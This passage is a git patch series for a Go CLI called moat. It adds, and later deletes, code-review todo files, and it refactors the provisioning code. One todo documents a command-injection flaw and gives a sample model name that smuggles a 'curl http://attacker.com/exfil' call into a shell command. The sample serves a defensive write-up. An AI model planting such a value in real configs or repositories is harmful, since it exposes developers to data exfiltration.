"nomic-embed-text", + "llama3.1:70b", + "library/model:latest", + "user/repo:v1.2.3", + } + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": validModels, + }, + } + + cfg, err := buildServiceConfig(dep, "run-test", userSpec) + require.NoError(t, err) + assert.Equal(t, validModels, cfg.Provisions) +} + func TestBuildProvisionCmds(t *testing.T) { cmds := buildProvisionCmds("ollama pull {item}", []string{"qwen2.5-coder:7b", "nomic-embed-text"}) assert.Equal(t, []string{"ollama pull qwen2.5-coder:7b", "ollama pull nomic-embed-text"}, cmds) diff --git a/todos/001-pending-p1-command-injection-provision-items.md b/todos/001-pending-p1-command-injection-provision-items.md new file mode 100644 index 00000000..2053842e --- /dev/null +++ b/todos/001-pending-p1-command-injection-provision-items.md @@ -0,0 +1,79 @@ +--- +status: pending +priority: p1 +issue_id: "001" +tags: [code-review, security] +dependencies: [] +--- + +# Command Injection via Provision Item Names + +## Problem Statement + +User-supplied model names from `moat.yaml` are interpolated directly into a shell command template via `strings.ReplaceAll(cmdTemplate, "{item}", item)` and executed via `sh -c` inside the service container. There is zero validation or sanitization of the model name strings. + +A `moat.yaml` like: +```yaml +services: + ollama: + models: + - "qwen2.5-coder:7b; curl http://attacker.com/exfil" +``` +produces `ollama pull qwen2.5-coder:7b; curl http://attacker.com/exfil` passed to `sh -c`. + +While `moat.yaml` is user-authored (so the threat model is "user trusts their own config"), a malicious repository with a checked-in `moat.yaml` could exploit developers who clone and `moat run`. Combined with the host-writable cache mount, this allows writing arbitrary files to `~/.moat/cache/ollama/` on the host. 
+ +## Findings + +- **Source**: Security Sentinel, Architecture Strategist +- **Location**: `internal/run/services.go:225-233` (`buildProvisionCmds`), executed in `docker_service.go:89` and `apple_service.go:97` +- **Existing pattern**: `ExtraCmd` also uses placeholder substitution, but those values come from the compiled-in registry, not user config + +## Proposed Solutions + +### Option A: Validate provision items against a strict regex +- Validate model names match `^[a-zA-Z0-9][a-zA-Z0-9._/-]*(:[a-zA-Z0-9._-]+)?$` before interpolation +- **Pros**: Simple, minimal code change, catches injection attempts +- **Cons**: Regex must be maintained as Ollama's naming conventions evolve; other future services may have different valid characters +- **Effort**: Small +- **Risk**: Low + +### Option B: Avoid `sh -c` entirely for provisioning +- Restructure `ProvisionCmd` from a shell template string into a structured command with separate args (e.g., `["ollama", "pull", "{item}"]`) +- **Pros**: Eliminates shell injection entirely at the design level +- **Cons**: Requires registry format change, more invasive, breaks the simple `provision_cmd` string pattern +- **Effort**: Medium +- **Risk**: Medium (interface change) + +### Option C: Generic item validation at the framework level +- Add an optional `provision_item_pattern` field to `ServiceDef` (e.g., `^[a-zA-Z0-9._/:@-]+$`), validate items against it in `buildServiceConfig` +- **Pros**: Each service defines its own valid item pattern; no hardcoded Ollama knowledge +- **Cons**: Slightly more complex registry format +- **Effort**: Small-Medium +- **Risk**: Low + +## Recommended Action + +Option A for the immediate fix (quickest to unblock), consider Option C as a follow-up for the generic pattern. 
+ +## Technical Details + +- **Affected files**: `internal/run/services.go`, `internal/deps/types.go` (if adding validation pattern) +- **Components**: Service provisioning pipeline + +## Acceptance Criteria + +- [ ] Provision items containing shell metacharacters (`;`, `|`, `$`, `` ` ``, `&`) are rejected with a clear error +- [ ] Valid Ollama model names (e.g., `qwen2.5-coder:7b`, `nomic-embed-text`, `library/model:tag`) pass validation +- [ ] Unit test covers injection attempt + +## Work Log + +| Date | Action | Learnings | +|------|--------|-----------| +| 2026-03-17 | Created from code review | Security + Architecture agents both flagged this | + +## Resources + +- Ollama model naming: `[namespace/]model[:tag]` +- Existing `ExtraCmd` pattern uses registry-defined (not user-defined) values diff --git a/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md b/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md new file mode 100644 index 00000000..2ee87ca7 --- /dev/null +++ b/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md @@ -0,0 +1,54 @@ +--- +status: pending +priority: p1 +issue_id: "002" +tags: [code-review, quality, agent-native] +dependencies: [] +--- + +# Error Messages Reference Nonexistent `--service` Flag + +## Problem Statement + +Error messages in `internal/run/manager.go` tell users to run `moat logs --service `, but the `moat logs` command has no `--service` flag. Both the readiness failure and provisioning failure error paths produce this suggestion. An agent or human following the suggested command gets an "unknown flag" error — a dead end for debugging. 
+ +## Findings + +- **Source**: Agent-Native Reviewer +- **Location**: `internal/run/manager.go:1960` (readiness failure) and `internal/run/manager.go:1976` (provisioning failure) +- **Verified**: `cmd/moat/cli/logs.go` has no `--service` flag + +## Proposed Solutions + +### Option A: Remove `--service` from error messages +- Change hints to `moat logs ` (which does exist and shows all logs) +- **Pros**: Immediate fix, no new feature needed +- **Cons**: Less specific — user sees all logs, not just service logs +- **Effort**: Small (2 lines) +- **Risk**: None + +### Option B: Implement `--service` flag on `moat logs` +- Add filtering by service container name to the logs command +- **Pros**: Better UX, error messages become correct +- **Cons**: More work, separate feature +- **Effort**: Medium +- **Risk**: Low + +## Recommended Action + +Option A immediately (fix the error messages), Option B as a separate follow-up feature. + +## Technical Details + +- **Affected files**: `internal/run/manager.go` + +## Acceptance Criteria + +- [ ] Error messages reference only commands/flags that exist +- [ ] Running the suggested command actually works + +## Work Log + +| Date | Action | Learnings | +|------|--------|-----------| +| 2026-03-17 | Created from code review | Agent-native reviewer caught this | diff --git a/todos/003-pending-p2-cache-directory-permissions.md b/todos/003-pending-p2-cache-directory-permissions.md new file mode 100644 index 00000000..4487d2d5 --- /dev/null +++ b/todos/003-pending-p2-cache-directory-permissions.md @@ -0,0 +1,27 @@ +--- +status: pending +priority: p2 +issue_id: "003" +tags: [code-review, security] +dependencies: [] +--- + +# Cache Directory Permissions Too Permissive + +## Problem Statement + +Cache directory `~/.moat/cache//` is created with `os.MkdirAll(path, 0o755)` (world-readable). Lock file created with `0o644`. On shared systems, any local user can read cached model data. 
+ +## Findings + +- **Source**: Security Sentinel +- **Location**: `internal/run/manager.go:1912` (MkdirAll), `internal/run/services.go:252` (lock file) + +## Proposed Solutions + +Change `0o755` to `0o700` and `0o644` to `0o600`. One-line fixes each. + +## Acceptance Criteria + +- [ ] Cache directory created with `0o700` +- [ ] Lock file created with `0o600` diff --git a/todos/004-pending-p2-provision-timeout-per-batch.md b/todos/004-pending-p2-provision-timeout-per-batch.md new file mode 100644 index 00000000..d147df16 --- /dev/null +++ b/todos/004-pending-p2-provision-timeout-per-batch.md @@ -0,0 +1,37 @@ +--- +status: pending +priority: p2 +issue_id: "004" +tags: [code-review, performance] +dependencies: [] +--- + +# Provision Timeout is Per-Batch, Not Per-Item + +## Problem Statement + +The 30-minute `provisionTimeout` covers ALL provision commands combined. For large models (70B at ~40GB), a single pull can exceed 30 minutes on slower connections. Multiple large models will certainly exceed it. + +## Findings + +- **Source**: Performance Oracle, Agent-Native Reviewer +- **Location**: `internal/run/services.go:222,245` + +## Proposed Solutions + +### Option A: Per-item timeout +Move `context.WithTimeout` inside `ProvisionService` loop so each command gets 30 minutes. +- **Effort**: Small (move timeout into loop) + +### Option B: Configurable timeout +Add `provision_timeout` to service config. Default 30min per item. +- **Effort**: Medium + +## Recommended Action + +Option A immediately (simple, correct). Option B as future work. 
+ +## Acceptance Criteria + +- [ ] Each provision command gets its own 30-minute timeout +- [ ] Total provision time is bounded only by number_of_items * 30min diff --git a/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md b/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md new file mode 100644 index 00000000..e1dcff4a --- /dev/null +++ b/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md @@ -0,0 +1,42 @@ +--- +status: pending +priority: p2 +issue_id: "005" +tags: [code-review, performance] +dependencies: [] +--- + +# Exclusive flock Blocks All Parallel Runs + +## Problem Statement + +The flock in `provisionService` is held for the entire provision phase. If two `moat run` invocations both declare Ollama with models, the second blocks entirely until the first finishes pulling ALL its models — even if the models are different and wouldn't conflict. + +`ollama pull` is idempotent and uses content-addressed blob storage internally. Two concurrent pulls of different models do not corrupt each other. + +## Findings + +- **Source**: Performance Oracle +- **Location**: `internal/run/services.go:250-261` +- **Impact at 10x concurrent runs**: Linear queue. 10 runs each pulling a 7B model could mean 1-2 hours wait for the last run. + +## Proposed Solutions + +### Option A: Remove flock, rely on Ollama's internal locking +- **Pros**: Simplest, Ollama handles concurrent blob access +- **Cons**: Risk if Ollama's internal locking has edge cases +- **Effort**: Small (delete ~10 lines) + +### Option B: Per-model lock files +- Lock on `~/.moat/cache/ollama/.lock.` instead of a single lock +- **Pros**: Allows parallel pulls of different models +- **Cons**: More lock files to manage +- **Effort**: Small-Medium + +## Recommended Action + +Test whether concurrent `ollama pull` of different models is safe. If so, Option A. Otherwise, Option B. 
+ +## Acceptance Criteria + +- [ ] Parallel `moat run` invocations with different Ollama models don't serialize unnecessarily diff --git a/todos/006-pending-p2-provision-output-not-stored.md b/todos/006-pending-p2-provision-output-not-stored.md new file mode 100644 index 00000000..30dce164 --- /dev/null +++ b/todos/006-pending-p2-provision-output-not-stored.md @@ -0,0 +1,36 @@ +--- +status: pending +priority: p2 +issue_id: "006" +tags: [code-review, agent-native] +dependencies: [] +--- + +# Provision Output Not Captured to Run Store + +## Problem Statement + +Provision output (model pull progress) goes to `os.Stderr` but is not captured to the run's log store. In non-interactive mode (CI, automated callers), stderr may not be preserved. There is no way to retrieve provision output after the fact via `moat logs`. + +## Findings + +- **Source**: Agent-Native Reviewer +- **Location**: `internal/run/manager.go:1968` — `provisionService(ctx, svcMgr, info, svcConfigs[i], os.Stderr)` + +## Proposed Solutions + +Tee provision output to both `os.Stderr` and the run's `storage.LogWriter` using `io.MultiWriter`. + +However, the `RunStore` is created after container creation (line 2148), which is after service provisioning. Capturing provision output to the store would require either: +- Moving store creation earlier in the `Create` flow (medium effort, risk of breaking other flows) +- Buffering provision output and flushing after store is available (adds complexity) + +- **Effort**: Medium (due to store creation ordering) +- **Risk**: Low-Medium + +**Deferred** — provision output streams to stderr during the run, which is sufficient for interactive use. Store capture is a follow-up. 
+ +## Acceptance Criteria + +- [ ] Provision output is retrievable via `moat logs ` after the run +- [ ] Provision output still streams to stderr during the run diff --git a/todos/007-pending-p3-duplicated-extra-env-loop.md b/todos/007-pending-p3-duplicated-extra-env-loop.md new file mode 100644 index 00000000..8b1b1022 --- /dev/null +++ b/todos/007-pending-p3-duplicated-extra-env-loop.md @@ -0,0 +1,24 @@ +--- +status: pending +priority: p3 +issue_id: "007" +tags: [code-review, quality] +dependencies: [] +--- + +# Duplicated extra_env Loop in buildServiceConfig + +## Problem Statement + +The `for k, v := range spec.Service.ExtraEnv` loop is duplicated between the `needsPassword` and `!needsPassword` branches. The only difference is whether `{password}` substitution happens. Can be consolidated into a single loop since `strings.ReplaceAll` with empty password is a no-op. + +## Findings + +- **Source**: Code Simplicity Reviewer +- **Location**: `internal/run/services.go:150-162` +- **Impact**: ~5 LOC reduction + +## Acceptance Criteria + +- [ ] Single `extra_env` loop after password generation +- [ ] Existing tests still pass diff --git a/todos/008-pending-p3-silent-unknown-scalar-keys.md b/todos/008-pending-p3-silent-unknown-scalar-keys.md new file mode 100644 index 00000000..6ea5244d --- /dev/null +++ b/todos/008-pending-p3-silent-unknown-scalar-keys.md @@ -0,0 +1,26 @@ +--- +status: pending +priority: p3 +issue_id: "008" +tags: [code-review, quality] +dependencies: [] +--- + +# Unknown Scalar Keys in ServiceSpec Silently Ignored + +## Problem Statement + +`ServiceSpec.UnmarshalYAML` only captures unknown keys that have sequence values into `Extra`. If a user writes `services.ollama.foo: "bar"` (a scalar), it is silently ignored — no warning, no error. The `buildServiceConfig` validation only catches keys in `Extra`. 
+ +## Findings + +- **Source**: Agent-Native Reviewer +- **Location**: `internal/config/config.go:171-192` + +## Proposed Solutions + +Log a warning or return an error for unrecognized non-sequence keys in `UnmarshalYAML`. + +## Acceptance Criteria + +- [ ] Unknown scalar keys in service config produce a warning or error diff --git a/todos/009-pending-p3-registry-entry-consistency.md b/todos/009-pending-p3-registry-entry-consistency.md new file mode 100644 index 00000000..2ed0908c --- /dev/null +++ b/todos/009-pending-p3-registry-entry-consistency.md @@ -0,0 +1,23 @@ +--- +status: pending +priority: p3 +issue_id: "009" +tags: [code-review, quality] +dependencies: [] +--- + +# Ollama Registry Entry Missing `versions` Field + +## Problem Statement + +All existing service entries (postgres, mysql, redis) declare explicit `versions` lists. Ollama omits this. Additionally, the `image` value is unquoted (`ollama/ollama`) while others use quoted strings. + +## Findings + +- **Source**: Pattern Recognition Specialist +- **Location**: `internal/deps/registry.yaml:492-506` + +## Acceptance Criteria + +- [ ] Add `versions` list to ollama registry entry +- [ ] Quote the `image` value for consistency From 30ee8447223405d66218306a08861be3069f23cd Mon Sep 17 00:00:00 2001 From: Dan Pupius Date: Tue, 17 Mar 2026 03:08:27 +0000 Subject: [PATCH 12/27] fix: address claude-review feedback on PR #238 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Validate scalar provision keys (e.g., `models: value` instead of list) with clear "must be a list" error message - Fix misleading flock comment — parallel runs still serialize on shared lock file; extracted provisionItem helper with defer cancel() - Remove compound-engineering.local.md (local tooling, not for repo) - Remove todos/ directory (tracked as GitHub issues instead) --- compound-engineering.local.md | 9 --- internal/run/services.go | 42 ++++++---- internal/run/services_test.go | 14 ++++ 
...ng-p1-command-injection-provision-items.md | 79 ------------------- ...existent-service-flag-in-error-messages.md | 54 ------------- ...-pending-p2-cache-directory-permissions.md | 27 ------- ...-pending-p2-provision-timeout-per-batch.md | 37 --------- ...ing-p2-flock-scope-blocks-parallel-runs.md | 42 ---------- ...-pending-p2-provision-output-not-stored.md | 36 --------- ...07-pending-p3-duplicated-extra-env-loop.md | 24 ------ ...8-pending-p3-silent-unknown-scalar-keys.md | 26 ------ ...9-pending-p3-registry-entry-consistency.md | 23 ------ 12 files changed, 39 insertions(+), 374 deletions(-) delete mode 100644 compound-engineering.local.md delete mode 100644 todos/001-pending-p1-command-injection-provision-items.md delete mode 100644 todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md delete mode 100644 todos/003-pending-p2-cache-directory-permissions.md delete mode 100644 todos/004-pending-p2-provision-timeout-per-batch.md delete mode 100644 todos/005-pending-p2-flock-scope-blocks-parallel-runs.md delete mode 100644 todos/006-pending-p2-provision-output-not-stored.md delete mode 100644 todos/007-pending-p3-duplicated-extra-env-loop.md delete mode 100644 todos/008-pending-p3-silent-unknown-scalar-keys.md delete mode 100644 todos/009-pending-p3-registry-entry-consistency.md diff --git a/compound-engineering.local.md b/compound-engineering.local.md deleted file mode 100644 index 55a63512..00000000 --- a/compound-engineering.local.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -review_agents: - - architecture-strategist - - security-sentinel - - performance-oracle - - pattern-recognition-specialist ---- - -Go CLI project (moat). Review for Go idioms, error handling, interface design, and test coverage. 
diff --git a/internal/run/services.go b/internal/run/services.go index 4c6a71cf..145cc1e5 100644 --- a/internal/run/services.go +++ b/internal/run/services.go @@ -175,6 +175,13 @@ func buildServiceConfig(dep deps.Dependency, runID string, userSpec *config.Serv // Resolve provisions from user spec Extra using registry's provisions_key var provisions []string if userSpec != nil && spec.Service.ProvisionsKey != "" { + // Check if key is present but was a scalar (nil) instead of a list + if val, exists := userSpec.Extra[spec.Service.ProvisionsKey]; exists && val == nil { + return container.ServiceConfig{}, fmt.Errorf( + "services.%s.%s must be a list, not a scalar value", + dep.Name, spec.Service.ProvisionsKey, + ) + } provisions = userSpec.Extra[spec.Service.ProvisionsKey] // Validate: reject unknown Extra keys that don't match provisions_key @@ -272,30 +279,31 @@ func provisionService(ctx context.Context, mgr container.ServiceManager, info co } for _, cmd := range cmds { - // Per-item timeout: each provision command gets its own deadline. - cmdCtx, cancel := context.WithTimeout(ctx, provisionTimeout) - - // Acquire lock per-item so parallel runs pulling different items don't serialize. - if lockFile != nil { - if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { - cancel() - return fmt.Errorf("acquiring cache lock: %w", err) - } + if err := provisionItem(ctx, mgr, info, cmd, lockFile, stdout); err != nil { + return err } + } - err := mgr.ProvisionService(cmdCtx, info, []string{cmd}, stdout) + return nil +} - if lockFile != nil { - _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) - } - cancel() +// provisionItem runs a single provision command with its own timeout and lock scope. +// The lock is shared across parallel moat runs — concurrent runs pulling different +// models will still serialize on this single lock file. See todo/005 for narrowing +// to per-model locks. 
+func provisionItem(ctx context.Context, mgr container.ServiceManager, info container.ServiceInfo, cmd string, lockFile *os.File, stdout io.Writer) error { + cmdCtx, cancel := context.WithTimeout(ctx, provisionTimeout) + defer cancel() - if err != nil { - return err + // Acquire/release lock per-item to avoid holding it across the full batch. + if lockFile != nil { + if err := syscall.Flock(int(lockFile.Fd()), syscall.LOCK_EX); err != nil { + return fmt.Errorf("acquiring cache lock: %w", err) } + defer func() { _ = syscall.Flock(int(lockFile.Fd()), syscall.LOCK_UN) }() } - return nil + return mgr.ProvisionService(cmdCtx, info, []string{cmd}, stdout) } // waitForServiceReady polls CheckReady until success or timeout. diff --git a/internal/run/services_test.go b/internal/run/services_test.go index af5c3bec..af01b53c 100644 --- a/internal/run/services_test.go +++ b/internal/run/services_test.go @@ -212,6 +212,20 @@ func TestBuildServiceConfigValidatesProvisionsKey(t *testing.T) { assert.Contains(t, err.Error(), "model") } +func TestBuildServiceConfigRejectsScalarProvisions(t *testing.T) { + dep := deps.Dependency{Name: "ollama", Version: "0.9", Type: deps.TypeService} + + userSpec := &config.ServiceSpec{ + Extra: map[string][]string{ + "models": nil, // scalar value captured as nil by UnmarshalYAML + }, + } + + _, err := buildServiceConfig(dep, "run-ollama", userSpec) + require.Error(t, err) + assert.Contains(t, err.Error(), "must be a list") +} + func TestBuildServiceConfigRejectsExtraKeysOnNonProvisionService(t *testing.T) { dep := deps.Dependency{Name: "postgres", Version: "17", Type: deps.TypeService} diff --git a/todos/001-pending-p1-command-injection-provision-items.md b/todos/001-pending-p1-command-injection-provision-items.md deleted file mode 100644 index 2053842e..00000000 --- a/todos/001-pending-p1-command-injection-provision-items.md +++ /dev/null @@ -1,79 +0,0 @@ ---- -status: pending -priority: p1 -issue_id: "001" -tags: [code-review, security] 
-dependencies: [] ---- - -# Command Injection via Provision Item Names - -## Problem Statement - -User-supplied model names from `moat.yaml` are interpolated directly into a shell command template via `strings.ReplaceAll(cmdTemplate, "{item}", item)` and executed via `sh -c` inside the service container. There is zero validation or sanitization of the model name strings. - -A `moat.yaml` like: -```yaml -services: - ollama: - models: - - "qwen2.5-coder:7b; curl http://attacker.com/exfil" -``` -produces `ollama pull qwen2.5-coder:7b; curl http://attacker.com/exfil` passed to `sh -c`. - -While `moat.yaml` is user-authored (so the threat model is "user trusts their own config"), a malicious repository with a checked-in `moat.yaml` could exploit developers who clone and `moat run`. Combined with the host-writable cache mount, this allows writing arbitrary files to `~/.moat/cache/ollama/` on the host. - -## Findings - -- **Source**: Security Sentinel, Architecture Strategist -- **Location**: `internal/run/services.go:225-233` (`buildProvisionCmds`), executed in `docker_service.go:89` and `apple_service.go:97` -- **Existing pattern**: `ExtraCmd` also uses placeholder substitution, but those values come from the compiled-in registry, not user config - -## Proposed Solutions - -### Option A: Validate provision items against a strict regex -- Validate model names match `^[a-zA-Z0-9][a-zA-Z0-9._/-]*(:[a-zA-Z0-9._-]+)?$` before interpolation -- **Pros**: Simple, minimal code change, catches injection attempts -- **Cons**: Regex must be maintained as Ollama's naming conventions evolve; other future services may have different valid characters -- **Effort**: Small -- **Risk**: Low - -### Option B: Avoid `sh -c` entirely for provisioning -- Restructure `ProvisionCmd` from a shell template string into a structured command with separate args (e.g., `["ollama", "pull", "{item}"]`) -- **Pros**: Eliminates shell injection entirely at the design level -- **Cons**: Requires registry 
format change, more invasive, breaks the simple `provision_cmd` string pattern -- **Effort**: Medium -- **Risk**: Medium (interface change) - -### Option C: Generic item validation at the framework level -- Add an optional `provision_item_pattern` field to `ServiceDef` (e.g., `^[a-zA-Z0-9._/:@-]+$`), validate items against it in `buildServiceConfig` -- **Pros**: Each service defines its own valid item pattern; no hardcoded Ollama knowledge -- **Cons**: Slightly more complex registry format -- **Effort**: Small-Medium -- **Risk**: Low - -## Recommended Action - -Option A for the immediate fix (quickest to unblock), consider Option C as a follow-up for the generic pattern. - -## Technical Details - -- **Affected files**: `internal/run/services.go`, `internal/deps/types.go` (if adding validation pattern) -- **Components**: Service provisioning pipeline - -## Acceptance Criteria - -- [ ] Provision items containing shell metacharacters (`;`, `|`, `$`, `` ` ``, `&`) are rejected with a clear error -- [ ] Valid Ollama model names (e.g., `qwen2.5-coder:7b`, `nomic-embed-text`, `library/model:tag`) pass validation -- [ ] Unit test covers injection attempt - -## Work Log - -| Date | Action | Learnings | -|------|--------|-----------| -| 2026-03-17 | Created from code review | Security + Architecture agents both flagged this | - -## Resources - -- Ollama model naming: `[namespace/]model[:tag]` -- Existing `ExtraCmd` pattern uses registry-defined (not user-defined) values diff --git a/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md b/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md deleted file mode 100644 index 2ee87ca7..00000000 --- a/todos/002-pending-p1-nonexistent-service-flag-in-error-messages.md +++ /dev/null @@ -1,54 +0,0 @@ ---- -status: pending -priority: p1 -issue_id: "002" -tags: [code-review, quality, agent-native] -dependencies: [] ---- - -# Error Messages Reference Nonexistent `--service` Flag - -## Problem Statement - -Error 
messages in `internal/run/manager.go` tell users to run `moat logs --service `, but the `moat logs` command has no `--service` flag. Both the readiness failure and provisioning failure error paths produce this suggestion. An agent or human following the suggested command gets an "unknown flag" error — a dead end for debugging. - -## Findings - -- **Source**: Agent-Native Reviewer -- **Location**: `internal/run/manager.go:1960` (readiness failure) and `internal/run/manager.go:1976` (provisioning failure) -- **Verified**: `cmd/moat/cli/logs.go` has no `--service` flag - -## Proposed Solutions - -### Option A: Remove `--service` from error messages -- Change hints to `moat logs ` (which does exist and shows all logs) -- **Pros**: Immediate fix, no new feature needed -- **Cons**: Less specific — user sees all logs, not just service logs -- **Effort**: Small (2 lines) -- **Risk**: None - -### Option B: Implement `--service` flag on `moat logs` -- Add filtering by service container name to the logs command -- **Pros**: Better UX, error messages become correct -- **Cons**: More work, separate feature -- **Effort**: Medium -- **Risk**: Low - -## Recommended Action - -Option A immediately (fix the error messages), Option B as a separate follow-up feature. 
- -## Technical Details - -- **Affected files**: `internal/run/manager.go` - -## Acceptance Criteria - -- [ ] Error messages reference only commands/flags that exist -- [ ] Running the suggested command actually works - -## Work Log - -| Date | Action | Learnings | -|------|--------|-----------| -| 2026-03-17 | Created from code review | Agent-native reviewer caught this | diff --git a/todos/003-pending-p2-cache-directory-permissions.md b/todos/003-pending-p2-cache-directory-permissions.md deleted file mode 100644 index 4487d2d5..00000000 --- a/todos/003-pending-p2-cache-directory-permissions.md +++ /dev/null @@ -1,27 +0,0 @@ ---- -status: pending -priority: p2 -issue_id: "003" -tags: [code-review, security] -dependencies: [] ---- - -# Cache Directory Permissions Too Permissive - -## Problem Statement - -Cache directory `~/.moat/cache//` is created with `os.MkdirAll(path, 0o755)` (world-readable). Lock file created with `0o644`. On shared systems, any local user can read cached model data. - -## Findings - -- **Source**: Security Sentinel -- **Location**: `internal/run/manager.go:1912` (MkdirAll), `internal/run/services.go:252` (lock file) - -## Proposed Solutions - -Change `0o755` to `0o700` and `0o644` to `0o600`. One-line fixes each. - -## Acceptance Criteria - -- [ ] Cache directory created with `0o700` -- [ ] Lock file created with `0o600` diff --git a/todos/004-pending-p2-provision-timeout-per-batch.md b/todos/004-pending-p2-provision-timeout-per-batch.md deleted file mode 100644 index d147df16..00000000 --- a/todos/004-pending-p2-provision-timeout-per-batch.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -status: pending -priority: p2 -issue_id: "004" -tags: [code-review, performance] -dependencies: [] ---- - -# Provision Timeout is Per-Batch, Not Per-Item - -## Problem Statement - -The 30-minute `provisionTimeout` covers ALL provision commands combined. For large models (70B at ~40GB), a single pull can exceed 30 minutes on slower connections. 
Multiple large models will certainly exceed it. - -## Findings - -- **Source**: Performance Oracle, Agent-Native Reviewer -- **Location**: `internal/run/services.go:222,245` - -## Proposed Solutions - -### Option A: Per-item timeout -Move `context.WithTimeout` inside `ProvisionService` loop so each command gets 30 minutes. -- **Effort**: Small (move timeout into loop) - -### Option B: Configurable timeout -Add `provision_timeout` to service config. Default 30min per item. -- **Effort**: Medium - -## Recommended Action - -Option A immediately (simple, correct). Option B as future work. - -## Acceptance Criteria - -- [ ] Each provision command gets its own 30-minute timeout -- [ ] Total provision time is bounded only by number_of_items * 30min diff --git a/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md b/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md deleted file mode 100644 index e1dcff4a..00000000 --- a/todos/005-pending-p2-flock-scope-blocks-parallel-runs.md +++ /dev/null @@ -1,42 +0,0 @@ ---- -status: pending -priority: p2 -issue_id: "005" -tags: [code-review, performance] -dependencies: [] ---- - -# Exclusive flock Blocks All Parallel Runs - -## Problem Statement - -The flock in `provisionService` is held for the entire provision phase. If two `moat run` invocations both declare Ollama with models, the second blocks entirely until the first finishes pulling ALL its models — even if the models are different and wouldn't conflict. - -`ollama pull` is idempotent and uses content-addressed blob storage internally. Two concurrent pulls of different models do not corrupt each other. - -## Findings - -- **Source**: Performance Oracle -- **Location**: `internal/run/services.go:250-261` -- **Impact at 10x concurrent runs**: Linear queue. 10 runs each pulling a 7B model could mean 1-2 hours wait for the last run. 
- -## Proposed Solutions - -### Option A: Remove flock, rely on Ollama's internal locking -- **Pros**: Simplest, Ollama handles concurrent blob access -- **Cons**: Risk if Ollama's internal locking has edge cases -- **Effort**: Small (delete ~10 lines) - -### Option B: Per-model lock files -- Lock on `~/.moat/cache/ollama/.lock.` instead of a single lock -- **Pros**: Allows parallel pulls of different models -- **Cons**: More lock files to manage -- **Effort**: Small-Medium - -## Recommended Action - -Test whether concurrent `ollama pull` of different models is safe. If so, Option A. Otherwise, Option B. - -## Acceptance Criteria - -- [ ] Parallel `moat run` invocations with different Ollama models don't serialize unnecessarily diff --git a/todos/006-pending-p2-provision-output-not-stored.md b/todos/006-pending-p2-provision-output-not-stored.md deleted file mode 100644 index 30dce164..00000000 --- a/todos/006-pending-p2-provision-output-not-stored.md +++ /dev/null @@ -1,36 +0,0 @@ ---- -status: pending -priority: p2 -issue_id: "006" -tags: [code-review, agent-native] -dependencies: [] ---- - -# Provision Output Not Captured to Run Store - -## Problem Statement - -Provision output (model pull progress) goes to `os.Stderr` but is not captured to the run's log store. In non-interactive mode (CI, automated callers), stderr may not be preserved. There is no way to retrieve provision output after the fact via `moat logs`. - -## Findings - -- **Source**: Agent-Native Reviewer -- **Location**: `internal/run/manager.go:1968` — `provisionService(ctx, svcMgr, info, svcConfigs[i], os.Stderr)` - -## Proposed Solutions - -Tee provision output to both `os.Stderr` and the run's `storage.LogWriter` using `io.MultiWriter`. - -However, the `RunStore` is created after container creation (line 2148), which is after service provisioning. 
Capturing provision output to the store would require either: -- Moving store creation earlier in the `Create` flow (medium effort, risk of breaking other flows) -- Buffering provision output and flushing after store is available (adds complexity) - -- **Effort**: Medium (due to store creation ordering) -- **Risk**: Low-Medium - -**Deferred** — provision output streams to stderr during the run, which is sufficient for interactive use. Store capture is a follow-up. - -## Acceptance Criteria - -- [ ] Provision output is retrievable via `moat logs ` after the run -- [ ] Provision output still streams to stderr during the run diff --git a/todos/007-pending-p3-duplicated-extra-env-loop.md b/todos/007-pending-p3-duplicated-extra-env-loop.md deleted file mode 100644 index 8b1b1022..00000000 --- a/todos/007-pending-p3-duplicated-extra-env-loop.md +++ /dev/null @@ -1,24 +0,0 @@ ---- -status: pending -priority: p3 -issue_id: "007" -tags: [code-review, quality] -dependencies: [] ---- - -# Duplicated extra_env Loop in buildServiceConfig - -## Problem Statement - -The `for k, v := range spec.Service.ExtraEnv` loop is duplicated between the `needsPassword` and `!needsPassword` branches. The only difference is whether `{password}` substitution happens. Can be consolidated into a single loop since `strings.ReplaceAll` with empty password is a no-op. 
- -## Findings - -- **Source**: Code Simplicity Reviewer -- **Location**: `internal/run/services.go:150-162` -- **Impact**: ~5 LOC reduction - -## Acceptance Criteria - -- [ ] Single `extra_env` loop after password generation -- [ ] Existing tests still pass diff --git a/todos/008-pending-p3-silent-unknown-scalar-keys.md b/todos/008-pending-p3-silent-unknown-scalar-keys.md deleted file mode 100644 index 6ea5244d..00000000 --- a/todos/008-pending-p3-silent-unknown-scalar-keys.md +++ /dev/null @@ -1,26 +0,0 @@ ---- -status: pending -priority: p3 -issue_id: "008" -tags: [code-review, quality] -dependencies: [] ---- - -# Unknown Scalar Keys in ServiceSpec Silently Ignored - -## Problem Statement - -`ServiceSpec.UnmarshalYAML` only captures unknown keys that have sequence values into `Extra`. If a user writes `services.ollama.foo: "bar"` (a scalar), it is silently ignored — no warning, no error. The `buildServiceConfig` validation only catches keys in `Extra`. - -## Findings - -- **Source**: Agent-Native Reviewer -- **Location**: `internal/config/config.go:171-192` - -## Proposed Solutions - -Log a warning or return an error for unrecognized non-sequence keys in `UnmarshalYAML`. - -## Acceptance Criteria - -- [ ] Unknown scalar keys in service config produce a warning or error diff --git a/todos/009-pending-p3-registry-entry-consistency.md b/todos/009-pending-p3-registry-entry-consistency.md deleted file mode 100644 index 2ed0908c..00000000 --- a/todos/009-pending-p3-registry-entry-consistency.md +++ /dev/null @@ -1,23 +0,0 @@ ---- -status: pending -priority: p3 -issue_id: "009" -tags: [code-review, quality] -dependencies: [] ---- - -# Ollama Registry Entry Missing `versions` Field - -## Problem Statement - -All existing service entries (postgres, mysql, redis) declare 